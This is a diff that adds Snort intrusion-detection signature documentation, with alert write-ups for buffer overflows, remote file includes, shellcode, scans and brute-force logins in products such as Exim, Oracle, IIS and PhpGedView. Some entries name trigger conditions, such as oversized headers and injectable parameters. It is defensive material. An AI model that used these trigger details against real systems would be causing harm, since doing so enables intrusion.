+Summary: 
+This event is generated when an overly long Accept: parameter is sent in an 
+HTTP request, which will cause a buffer overflow to occur in the GFI 
+MailSecurity for Exchange/SMTP web interface.
+
+--
+Impact:
+A denial of service will occur in the vulnerable application, and remote code 
+may be executed with the priviliges of the user running the application.
+
+--
+Detailed Information:
+GFI MailSecurity for Exchange/SMTP is an anti-virus program that integrates 
+with Microsoft Exchange servers. Its web interface is vulnerable to a buffer 
+overflow attack, which may be triggered by sending a Accept: parameter of 100 
+or more bytes in an HTTP request. Vulnerable versions of the application will 
+crash, and code may be executed with the priviliges of the user running the 
+program.
+
+--
+Affected Systems:
+GFI MailSecurity for Exchange/SMTP 8.1
+
+--
+Attack Scenarios:
+Attackers will likley exploit this with a script.
+
+--
+Ease of Attack:
+Simple, as no authentication is required, and HTTP is a well-documented 
+protocol, which allows for easy creation of malicious packets.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Download and apply the patch referenced below.
+
+--
+Contributors:
+rmkml
+Sourcefire Research Team
+
+--
+Additional References
+ftp://ftp.gfi.com/patches/MSEC8_PATCH_20050919_01.zip
+
+--
--- /dev/null
+++ b/doc/signatures/2590.txt
@@ -0,0 +1,68 @@
+Rule:
+
+
+--
+Sid:
+2590
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the Mail Transfer Agent Exim.
+
+--
+Impact:
+A successful attack may allow the execution of arbitrary code on a vulnerable
+server with the privilege of the process running Exim.
+
+--
+Detailed Information:
+Exim is vulnerable to a buffer overflow, permitting an attacker to execute
+arbitrary code.  The vulnerability may be exploited if Exim is configured to
+verify header syntax in the e-mail message body.  This is not the default
+configuration.  If an attacker supplies a large number of spaces after certain
+header fields, it may be possible to cause a buffer overflow.
+
+--
+Affected Systems:
+Exim prior to version 4.34
+
+--
+Attack Scenarios:
+An attacker can create and send mail with a malformed header,
+possibly causing a buffer overflow and permitting the execution of arbitrary code.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References
+
+Bugtraq:
+http://www.securityfocus.com/bid/10291
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2004-0400
+
+Other:
+http://www.guninski.com/exim1.html
+
+--
--- /dev/null
+++ b/doc/signatures/2799.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2799
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure relocate_masterdef
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/404.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+
+Sid:
+404
+
+--
+
+Summary:
+This event is generated when An ICMP Protocol Unreachable datagram is detected on the network.  
+
+--
+
+Impact:
+This could be an indication of improperly configured routing equipment or network host.
+
+--
+
+Detailed Information: 
+This rule generates informational events about the network.  Routers will generate this message when the transport protocol designated in the datagram is not supported in the transport layer of the final destination.  Large numbers of these messages on the network could indication routing problems, faulty routing devices, or improperly configured hosts.
+
+--
+
+Attack Scenarios:
+None Known
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate these types of ICMP datagrams.
+
+--
+
+False Positives:
+None Known
+
+--
+
+False Negatives:
+None Known
+
+--
+
+Corrective Action:
+This rule detects informational network information, no corrective action is necessary.
+
+--
+
+Contributors:
+Original Rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/2926.txt
@@ -0,0 +1,60 @@
+Rule:  
+
+--
+Sid:
+2926
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in the PHP web application PhpGedView.
+
+--
+Impact:
+Execution of arbitrary code on the affected system
+
+--
+Detailed Information:
+PhpGedView contains a flaw such that it may be possible for an attacker
+to include code of their choosing by manipulating the PGV_BASE_DIRECTORY
+parameter when making a GET or POST  request to a vulnerable system.
+
+It may be possible for an attacker to execute that code with the
+privileges of the user running the webserver, usually root.
+
+--
+Affected Systems:
+	PhpGedView 2.65.1 and earlier
+
+--
+Attack Scenarios:
+An attacker can make a request to an affected script and define their
+own path to the PGV_BASE_DIRECTORY variable.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/952.txt
@@ -0,0 +1,78 @@
+Rule:
+
+--
+Sid:
+952
+
+--
+
+Summary:
+This event is generated when an attempt is made to use a Frontpage 
+client to connect and/or publish content to a web server with Frontpage 
+Server Extensions-enabled. 
+
+--
+
+Impact:
+An attacker can modify web content, access privileged files or modify 
+other users' privileges on the Frontpage-enabled virtual host.
+
+--
+
+Detailed Information:
+Microsoft Frontpage is a web-content managing and publishing 
+application, which also comes with server extensions for Microsoft IIS 
+and Apache web servers. The extensions enable the servers to display 
+dynamic content, as well as perform certain levels of web-server 
+administration.
+
+--
+
+Affected Systems:
+All systems running FPSE.
+
+--
+
+Attack Scenarios:
+An attacker can gain the FPSE username and password via sniffing, social
+engineering or brute force guessing. After successfully logging on to 
+the system, the attacker can alter web contents, modify login 
+information for other users and generally control the web server.
+
+--
+
+Ease of Attack:
+After gaining the login credentials the attack is trivial. 
+
+--
+
+False Positives:
+If FrontPage authoring is allowed from resources external to the 
+protected network this rule will generate an event.
+
+--
+
+False Negatives:
+Not known.
+
+--
+
+Corrective Action:
+Disable FPSE if it is not needed for web-content management.
+
+--
+
+Contributors:
+Original Rule Writer Unknown
+Snort documentation contributed by Chaos <c@aufbix.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+
+Additional References:
+
+Bugtraq:
+http://www.securityfocus.com/bid/2144
+
+--
--- /dev/null
+++ b/doc/signatures/1086.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1086
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a PHP web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a PHP application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the PHP application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running PHP applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/650.txt
@@ -0,0 +1,82 @@
+Rule:  
+--
+Sid:
+650
+
+--
+Summary:
+Shellcode to set the user identity to 0 (root) was detected.
+
+--
+Impact:
+If this code is executed successfully, it is possible for the current
+process to inherity root privledges.  However, setuid(2) requires root
+privledges to be executed in the first place if the current uid is
+attempting to get a higher priviledge level.
+
+--
+Detailed Information:
+Snort detected data resembling the x86 assembly code to change the
+user identity to 0.  
+
+
+--
+Affected Systems:
+ 
+--
+Attack Scenarios:
+As part of an attack on a remote service, an attacker may attempt to
+take advantage of insecure coding practices and execute code of his or
+her choosing through techniques known as 'buffer-overflows',
+'format-strings' and others.  Such attacks may contain code to change
+the identity of the current user to that of the root account (setuid
+0).  
+
+--
+Ease of Attack:
+Non-trivial.  Shellcode (and just x86 assembly code in general)
+requires a fairly intimate knowledge of computer architecture, memory
+structures, and many concepts that are part of the more arcane areas
+of computing.  Furthermore, if this was in fact an attack, the
+attacker needs to have a good idea of the design of the both the
+program and the system that he or she is attacking. The x86 setuid
+call itself is not particularly difficult, and by itself is not
+harmful.  However, combined with other carefuly aimed shellcode, it
+can be quite lethal.
+
+--
+False Positives:
+None Known
+Fairly high.  Large binary transfers, certain web traffic, and even
+mail traffic can trigger this rule, but are not necessarily indicative
+of actualy setuid code.
+
+--
+False Negatives:
+None Known
+Unknown, but probably possible.
+
+--
+Corrective Action:
+Determine what stream of traffic generated this particular alert.  If
+you only have the alert but not the entire packet, examine system for
+pecularities.  If you are smart and have the entire packet (or better
+yet, all your traffic for the past n hours), attempt to determine if
+this particular sequence of characters was part of an innocent stream
+of data (large binary transfers, for example) or part of a malicious
+act against your machine.  In either case, check for other activity
+from the host in question -- both currently collected traffic and
+traffic in the future.
+
+--
+Contributors:
+Original rule writer unknown
+Original document author unkown
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Jon Hart <warchild@spoofed.org> 
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1744.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1744
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/628.txt
@@ -0,0 +1,72 @@
+Rule:
+
+--
+Sid:
+628
+
+--
+Summary:
+This event is generated when the nmap port scanner and reconnaissance 
+tool is used against a host.
+
+--
+Impact:
+This could be part of a full scan by nmap and could indicate 
+potential malicious reconnaissance of the targeted network or host.
+
+--
+Detailed Information:
+Some versions of Nmap's TCP ping, if selected, sends a TCP ACK with an 
+ACK number = 0. 
+
+Nmap can use TCP ping as a second alternative to ICMP Ping.
+
+--
+Affected Systems:
+All systems not protected by a stateful firewall are affected. The TCP 
+Ping targeted port does  not need to be open on the host being probed to
+determine if the machine is alive or not.
+
+--
+Attack Scenarios:
+The first thing an attacker does is to gather some information about its
+target, he may use Nmap to see if the potential target is alive on 
+certain network. Included as part of the "pinging" technique used by 
+Nmap, a TCP ping can be used on certain networks that don't allow the 
+ICMP Protocol.
+
+--
+Ease of Attack:
+Simple. Nmap requires no specialized experience to use it.
+
+--
+False Positives:
+This particular Nmap TCP Ping uses a TCP ACK with an ACK Number = 0. It 
+is possible that other tools may also send a TCP ACK with an ACK number 
+of Zero.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Any stateful firewall should be enough to protect a host from being "TCP
+ACK probed". If you have more suspicious/malicious activity from the 
+host doing the portscan, follow your standard procedure to asess the 
+potential threat. If you only detect TCP Pings, that may be just a TCP 
+Ping Sweep and it is not a real threat.
+
+--
+Contributors:
+Original Rule Writer Unknown (prime suspect is Marty Roesch)
+Snort documentation contributed by Jose Hernandez <jrseal76@hotmail.com>
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+arachnids: ids28
+
+--
--- /dev/null
+++ b/doc/signatures/2778.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2778
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure drop_priority_varchar2
+. This procedure is included in
+dbms_repcat.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/100000401.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000401
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "Ovidentia" application running on a webserver. Access to the file "faq.php" using a remote file being passed as the "babInstallPath" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "babInstallPath" parameter in the "faq.php" script used by the "Ovidentia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Ovidentia
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
--- /dev/null
+++ b/doc/signatures/1568.txt
@@ -0,0 +1,67 @@
+Rule:
+
+--
+Sid: 1568
+
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a potential weakness on a host running Microsoft Internet Information Server (IIS). 
+
+--
+Impact:
+Information gathering possible administrator access.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit potential weaknesses in a host running Microsoft IIS.
+
+The attacker may be trying to gain information on the IIS implementation on the host, this may be the prelude to an attack against that host using that information.
+
+The attacker may also be trying to gain administrator access to the host, garner information on users of the system or retrieve sensitive customer information.
+
+Some applications may store sensitive information such as database connections, user information, passwords and customer information in files accessible via a web interface. Care should be taken to ensure these files are not accessible to external sources.
+
+--
+Affected Systems:
+Any host using IIS.
+
+--
+Attack Scenarios:
+An attacker can retrieve a sensitive file containing information on the IIS implementation. The attacker might then gain administrator access to the site, deface the content or gain access to a database.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the IIS implementation on the host. Ensure all measures have been taken to deny access to sensitive files.
+
+Ensure that the IIS implementation is fully patched.
+
+Ensure that the underlying operating system is fully patched.
+
+Employ strategies to harden the IIS implementation and operating system.
+
+Check the host for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+
+--
--- /dev/null
+++ b/doc/signatures/3006.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3006
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a
+vulnerability in Freespace 2.
+
+--
+Impact:
+A successful attack may present an attacker with the opportunity to
+execute arbitrary code on a vulnerable system.
+
+--
+Detailed Information:
+A vulnerability exists in in Freespace 2 that may allow an attacker to
+execute code of their choosing on a vulnerable system.
+
+The problem lies in the handling of data by the client application when
+processing server responses. Proper checks are not performed by the
+client application and large amounts of data in a server response may
+trigger a buffer overflow condition to occur, thus presenting the
+attacker with the opportunity to execute code.
+
+--
+Affected Systems:
+	Freespace 2
+
+--
+Attack Scenarios:
+An attacker may supply a large amount of data containing code of their
+choosing in a server response to client requests.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/605.txt
@@ -0,0 +1,58 @@
+Rule: 
+
+--
+Sid: 605
+
+--
+Summary: 
+This event is generated when a remote login attempt using rlogin fails.
+
+--
+Impact: 
+Someone has tried to login using rlogin and failed
+
+-- 
+Detailed Information: 
+This rule generates an event when a login failure message generated by rlogind is seen. rlogin is used on UNIX systems for remote connectivity and remote command execution.  
+
+Multiple events may indicate that an attacker is attempting a brute force password guessing attack.
+
+--
+Attack Scenarios: 
+An attacker finds a machine with rlogin service running and proceeds to guess the password remotely by connecting multiple times.
+
+--
+Ease of Attack: 
+Simple, no exploit software required
+
+--
+False Positives: 
+A legitimate user may generate an event by entering an incorrect password.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action: 
+Investigate logs on the target host for further details and more signs of suspicious activity
+
+Use ssh for remote access instead of rlogin.
+
+--
+Contributors: 
+Original rule by Max Vision <vision@whitehats.com> modified from a signature written by Ron Gula
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0651
+
+Arachnids:
+http://www.whitehats.com/info/IDS393
+
+--
--- /dev/null
+++ b/doc/signatures/2555.txt
@@ -0,0 +1,71 @@
+Rule: 
+
+--
+Sid: 
+2555
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Oracle Application Server Web Cache.
+
+-- 
+
+Impact: 
+Serious. Possible execution of arbitrary code leading to remote
+administrative access.
+
+--
+Detailed Information:
+The Oracle Application Server Web Cache is vulnerable to a buffer
+overrun caused by poor checking of the length of an HTTP Header. If a
+large invalid HTTP Request Method is supplied to a vulnerable system, an
+attacker may be presented with the opportunity to overrun a fixed length
+buffer and subsequently execute code of their choosing on the server.
+
+--
+Affected Systems:
+Oracle Application Server Web Cache 10g 9.0.4 .0
+Oracle Oracle9i Application Server Web Cache 2.0 .0.4
+Oracle Oracle9i Application Server Web Cache 9.0.2 .3
+Oracle Oracle9i Application Server Web Cache 9.0.2 .2
+Oracle Oracle9i Application Server Web Cache 9.0.3 .1
+
+--
+
+Attack Scenarios: 
+An attacker might supply an HTTP Request Method of more than 432 bytes,
+causing the overflow to occur.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives:
+None Known
+
+--
+False Negatives:
+This rule examines Oracle Web Cache server on port 7777 or 7778.  It is possible
+to configure the Oracle Web Cache server to run on different ports.  The rule
+should be configured to reflect the appropriate ports of Oracle Web Cache
+servers on your network.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1693.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1693
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1801.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1801
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a web server running Microsoft Internet Information
+Server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases. Denial of
+Service is possible.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running Microsoft Internet Information Server (IIS). Many known
+vulnerabilities exist for this platform and the attack scenarios are
+legion.
+
+--
+Affected Systems:
+	All systems running Microsoft IIS
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Many exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2440.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2440
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Real Networks RealPlayer/RealOne player.
+
+--
+Impact:
+Serious. Execution of arbitrary code.
+
+--
+Detailed Information:
+RealNetworks RealPlayer/RealOne player is a streaming media player for
+Microsoft Windows, Apple Macintosh and UNIX/Linux based operating systems.
+
+A buffer overrun condition is present in some versions of the player
+that may present a remote attacker with the opportunity to execute code
+of their choosing on a client using one of these players.
+
+--
+Affected Systems:
+	Real Networks RealOne Desktop Manager
+	Real Networks RealOne Enterprise Desktop 6.0.11 .774
+	Real Networks RealOne Player 1.0
+	Real Networks RealOne Player 2.0
+	Real Networks RealOne Player 6.0.11 .868
+	Real Networks RealOne Player version 2.0 for Windows
+	Real Networks RealPlayer 8.0 Win32
+	Real Networks RealPlayer 8.0 Unix
+	Real Networks RealPlayer 8.0 Mac
+	Real Networks RealPlayer 10.0 BETA
+
+--
+Attack Scenarios:
+An attacker may supply a malformed file to the client to exploit the
+issue.
+
+--
+Ease of Attack:
+Simple. 
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2067.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+2067
+
+--
+Summary:
+file on a Lotus Domino Server.
+
+--
+Impact:
+Information disclosure
+
+--
+Detailed Information:
+Certain versions of Lotus Domino web servers do not correctly handle 
+requests for script files not specific to Lotus Domino.
+
+By using a dot in the filename an attacker may view the source of the 
+script and be presented with sensitive information embedded in the 
+script.
+
+--
+Affected Systems:
+Lotus Domino Server 5.0 and 6.0
+
+--
+Attack Scenarios:
+The attacker merely needs to make an HTTP request for the script and add
+a dot to the filename. This can be done using a browser.
+
+--
+Ease of Attack:
+Simple
+
+--
+False Positives:
+The HotSaNIC (hotsanic.sourceforge.net) System and Network Info Centre
+can graph the occurence of worm attacks on a server against time. The
+HotSaNIC system displays 'WEB-MISC Lotus Notes .exe script source
+download attempt' type attacks in an image file called
+thumb-root.exe.gif. Each time this image is accessed it generates an
+event.
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Apply the appropriate vendor fixes
+
+Upgrade to the latest non-affected version of the software
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+False positive information contributed by Chris McMahon <chris@mcmahon.co.uk>
+
+--
+Additional References:
+
+Bugtraq
+http://www.securityfocus.com/bid/6841
+
+--
--- /dev/null
+++ b/doc/signatures/2956.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2956
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
--- /dev/null
